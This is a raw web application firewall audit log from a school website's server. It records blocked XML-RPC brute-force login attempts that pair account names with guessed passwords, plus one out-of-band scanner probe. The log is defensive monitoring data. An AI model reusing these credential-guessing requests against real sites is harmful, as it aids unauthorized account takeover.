+0700] aEQBT_ClubEPOra_8Ukb6QAAAA0 103.236.140.4 44976 103.236.140.4 8181 --08eeff18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --08eeff18-C-- wp.getUsersBlogs administrator 1234%^&* --08eeff18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08eeff18-E-- --08eeff18-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287247479851 5357 (- - -) Stopwatch2: 1749287247479851 5357; combined=4190, p1=497, p2=3489, p3=0, p4=0, p5=128, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08eeff18-Z-- --430be549-A-- [07/Jun/2025:16:07:50 +0700] aEQBZhK9gc79coX6mHSbZQAAAEo 103.236.140.4 45818 103.236.140.4 8181 --430be549-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --430be549-C-- wp.getUsersBlogs administrator michael --430be549-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --430be549-E-- --430be549-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (113+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287270022900 5319 (- - -) Stopwatch2: 1749287270022900 5319; combined=4065, p1=504, p2=3363, p3=0, p4=0, p5=119, sr=90, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --430be549-Z-- --a8175c68-A-- [07/Jun/2025:16:08:50 +0700] aEQBomCOO9DrcKL2J_4MdAAAANI 103.236.140.4 47802 103.236.140.4 8181 --a8175c68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a8175c68-C-- wp.getUsersBlogs administrator olivia --a8175c68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8175c68-E-- --a8175c68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (103+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287330313395 6212 (- - -) Stopwatch2: 1749287330313395 6212; combined=4382, p1=548, p2=3564, p3=0, p4=0, p5=150, sr=146, sw=120, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8175c68-Z-- --3e3eeb09-A-- [07/Jun/2025:16:09:50 +0700] aEQB3hK9gc79coX6mHScYwAAAFY 103.236.140.4 49644 103.236.140.4 8181 --3e3eeb09-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3e3eeb09-C-- wp.getUsersBlogs kajur kajur12345 --3e3eeb09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e3eeb09-E-- --3e3eeb09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287390206842 4731 (- - -) Stopwatch2: 1749287390206842 4731; combined=3543, p1=451, p2=2840, p3=0, p4=0, p5=141, sr=78, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e3eeb09-Z-- --f0917a10-A-- [07/Jun/2025:16:10:28 +0700] aEQCBBK9gc79coX6mHScsgAAAEc 103.236.140.4 50862 103.236.140.4 8181 --f0917a10-B-- POST /-/jira/login/oauth/access_token HTTP/1.0 Host: d111p98ir2cv0ugbr91g86tz9mw5x5pwm.oast.pro X-Real-IP: 114.10.45.127 X-Forwarded-Host: d111p98ir2cv0ugbr91g86tz9mw5x5pwm.oast.pro X-Forwarded-Server: d111p98ir2cv0ugbr91g86tz9mw5x5pwm.oast.pro X-Forwarded-For: 114.10.45.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/122.0.0.0 Safari/537.36 Accept: text/html Accept-Language: en-US --f0917a10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0917a10-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||d111p98ir2cv0ugbr91g86tz9mw5x5pwm.oast.pro|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749287428852695 968 (- - -) Stopwatch2: 1749287428852695 968; combined=347, p1=314, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0917a10-Z-- --3d541838-A-- [07/Jun/2025:16:10:50 +0700] aEQCGpANhDjQAvBdMyHtTwAAAJg 103.236.140.4 51710 103.236.140.4 8181 --3d541838-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3d541838-C-- wp.getUsersBlogs kajur kajurpwd --3d541838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d541838-E-- --3d541838-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (108+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287450744726 5554 (- - -) Stopwatch2: 1749287450744726 5554; combined=3916, p1=501, p2=3226, p3=0, p4=0, p5=109, sr=90, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d541838-Z-- --c3bd6e4d-A-- [07/Jun/2025:16:11:50 +0700] aEQCVvClubEPOra_8UkeFwAAABM 103.236.140.4 53604 103.236.140.4 8181 --c3bd6e4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c3bd6e4d-C-- wp.getUsersBlogs kajur nicholas --c3bd6e4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3bd6e4d-E-- --c3bd6e4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287510570026 4196 (- - -) Stopwatch2: 1749287510570026 4196; combined=3242, p1=390, p2=2702, p3=0, p4=0, p5=88, sr=80, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3bd6e4d-Z-- --bcf56b69-A-- [07/Jun/2025:16:12:50 +0700] aEQCkmCOO9DrcKL2J_4OcAAAANM 103.236.140.4 55364 103.236.140.4 8181 --bcf56b69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bcf56b69-C-- wp.getUsersBlogs kajur asdf3423 --bcf56b69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf56b69-E-- --bcf56b69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287570670169 5391 (- - -) Stopwatch2: 1749287570670169 5391; combined=3828, p1=449, p2=3175, p3=0, p4=0, p5=117, sr=87, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf56b69-Z-- --a2e1c317-A-- [07/Jun/2025:16:13:51 +0700] aEQCzxK9gc79coX6mHSeaQAAAFE 103.236.140.4 56870 103.236.140.4 8181 --a2e1c317-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a2e1c317-C-- wp.getUsersBlogs kajur Parola12 --a2e1c317-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2e1c317-E-- --a2e1c317-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (114+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287631015152 5316 (- - -) Stopwatch2: 1749287631015152 5316; combined=3697, p1=467, p2=3053, p3=0, p4=0, p5=104, sr=91, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2e1c317-Z-- --521c007b-A-- [07/Jun/2025:16:14:51 +0700] aEQDC_ClubEPOra_8UkfmwAAAAM 103.236.140.4 58476 103.236.140.4 8181 --521c007b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --521c007b-C-- wp.getUsersBlogs kajur 7654321 --521c007b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --521c007b-E-- --521c007b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287691268751 4198 (- - -) Stopwatch2: 1749287691268751 4198; combined=3089, p1=375, p2=2572, p3=0, p4=0, p5=83, sr=74, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --521c007b-Z-- --5266c902-A-- [07/Jun/2025:16:15:51 +0700] aEQDR_ClubEPOra_8UkgYgAAAAo 103.236.140.4 60052 103.236.140.4 8181 --5266c902-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5266c902-C-- wp.getUsersBlogs kajur supervisor --5266c902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5266c902-E-- --5266c902-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287751053071 5987 (- - -) Stopwatch2: 1749287751053071 5987; combined=4200, p1=520, p2=3481, p3=0, p4=0, p5=114, sr=133, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5266c902-Z-- --d468d41a-A-- [07/Jun/2025:16:16:50 +0700] aEQDgvClubEPOra_8UkhTQAAAAo 103.236.140.4 33252 103.236.140.4 8181 --d468d41a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d468d41a-C-- wp.getUsersBlogs kajur 1234%^&* --d468d41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d468d41a-E-- --d468d41a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287810674336 5696 (- - -) Stopwatch2: 1749287810674336 5696; combined=4129, p1=440, p2=3497, p3=0, p4=0, p5=115, sr=83, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d468d41a-Z-- --a9d3103d-A-- [07/Jun/2025:16:16:51 +0700] aEQDg2COO9DrcKL2J_4QQwAAAMg 103.236.140.4 33262 103.236.140.4 8181 --a9d3103d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a9d3103d-C-- wp.getUsersBlogs kajur pakistan --a9d3103d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9d3103d-E-- --a9d3103d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (115+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287811058008 5526 (- - -) Stopwatch2: 1749287811058008 5526; combined=3915, p1=476, p2=3229, p3=0, p4=0, p5=120, sr=108, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9d3103d-Z-- --78491f7c-A-- [07/Jun/2025:16:17:51 +0700] aEQDv5ANhDjQAvBdMyHvfwAAAIo 103.236.140.4 35142 103.236.140.4 8181 --78491f7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --78491f7c-C-- wp.getUsersBlogs kajur 159753 --78491f7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78491f7c-E-- --78491f7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287871256193 4371 (- - -) Stopwatch2: 1749287871256193 4371; combined=3402, p1=379, p2=2824, p3=0, p4=0, p5=115, sr=80, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78491f7c-Z-- --dcc16227-A-- [07/Jun/2025:16:18:51 +0700] aEQD-5ANhDjQAvBdMyHwBgAAAJE 103.236.140.4 37044 103.236.140.4 8181 --dcc16227-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dcc16227-C-- wp.getUsersBlogs kesiswaan kesiswaan@ --dcc16227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcc16227-E-- --dcc16227-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287931088482 5249 (- - -) Stopwatch2: 1749287931088482 5249; combined=3664, p1=426, p2=3052, p3=0, p4=0, p5=107, sr=84, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcc16227-Z-- --34aea609-A-- [07/Jun/2025:16:19:51 +0700] aEQEN2COO9DrcKL2J_4SRAAAAM8 103.236.140.4 38926 103.236.140.4 8181 --34aea609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --34aea609-C-- wp.getUsersBlogs kesiswaan kesiswaan@1997 --34aea609-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34aea609-E-- --34aea609-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
